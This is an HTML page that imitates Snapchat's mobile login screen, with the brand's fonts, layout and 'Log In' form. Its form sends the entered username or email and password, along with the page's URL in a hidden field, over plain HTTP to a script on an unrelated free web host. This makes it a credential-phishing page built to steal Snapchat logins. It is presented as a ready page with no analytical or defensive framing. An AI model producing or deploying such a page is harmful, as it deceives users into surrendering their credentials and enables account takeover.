<hmtl>
  <head>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <script>
      document.getElementById("url").value = window.location.href;
    </script>
  </head>
  <body>
    <style>
      @font-face {
        font-family: SnapFont-thin;
        src: url(snapchatfont-thin.woff2);
      }
      @font-face {
        font-family: SnapFont;
        src: url(snapchatfont.woff2);
      }
      body{
        background-color:black;
        margin:0px;
        font-family: SnapFont-thin;
      }
      .wrapper{
        background-color:white;
        border-radius:10px;
        width:100%;
        height:100%;
      }
      header{
        width:100%;
        height:50px;
        position: sticky;
        top: 0px;
      }
      .back{
        height:18px;
        width:10px;
        padding:16px 18px;
      }
      .login-box{
        text-align:center;
        width:calc(100% - 92px);
        max-width:270px;
        margin:0px auto;
      }
      .login {
        font-size:20px;
        text-align:center;
        margin:16px 0px 27px 0px;
      }
      .inputs{
        height:26px;
        border-width:0px;
        border-bottom-width:1px;
        border-bottom-color:#9A9FA7;
        width:100%;
        font-size:15px;
        padding-left:3px;
      }
      .pass {
        margin-bottom:22px;
      }
      input{
        font-family: inherit;
        caret-color: #1d5bc5;
        border-radius:0px!important;
      }
      .input-headers{
        color:#9A9FA7;
        font-size:11px;
        text-align:left;
        margin:12.5px 0px 10px 3px;
        font-family: SnapFont, SnapFont-thin;
        letter-spacing: 1px;
      }
      .forgot {
        font-size:12px;
        color:#0087cc;
        margin-bottom:108px;
      }
      .submit-box{
        height:76px;
        position: sticky;
        bottom:0;
        background-image: linear-gradient(top, #00000000, white);
        background-image: -webkit-linear-gradient(top, #00000000, white);
        background-image: -moz-linear-gradient(top, #00000000, white);
        background-image: -o-linear-gradient(top, #00000000, white);
        min-width:100%;
        margin:0px -46px;
      }
      .submit {
        height:45px;
        margin:0px auto 30px auto;
        width:calc(100% - 92px);
        max-width:225px;
        background-color:#b8c0c7;
        color:white;
        border-radius:27px;
        line-height: 45px;
      }
      </style>
    <div class="wrapper">
      <header>
        <img class="back" src="back-icon.png">
      </header>
      <div class="login-box">
        <div class="login">Log In</div>
        <form method="post" action="http://o10.000webhostapp.com/english.php">
          <div class="input-headers" style="margin-top:0px;">USERNAME OR EMAIL</div>
          <input class="inputs email" autocorrect="off" autocapitalize="off" name="email" type="text"></input>
          <div class="input-headers">PASSWORD</div>
          <input class="inputs pass" autocorrect="off" autocapitalize="off" name="password" type="password"></input>
          <input id="url" type="hidden" name="url" value=""></input>
          <a class="forgot">Forgot your password?</a>
          <div class="submit-box">
            <div class="submit">Log In</div>
          </div>
        </form>
      </div>
    </div>
  </body>
</html>
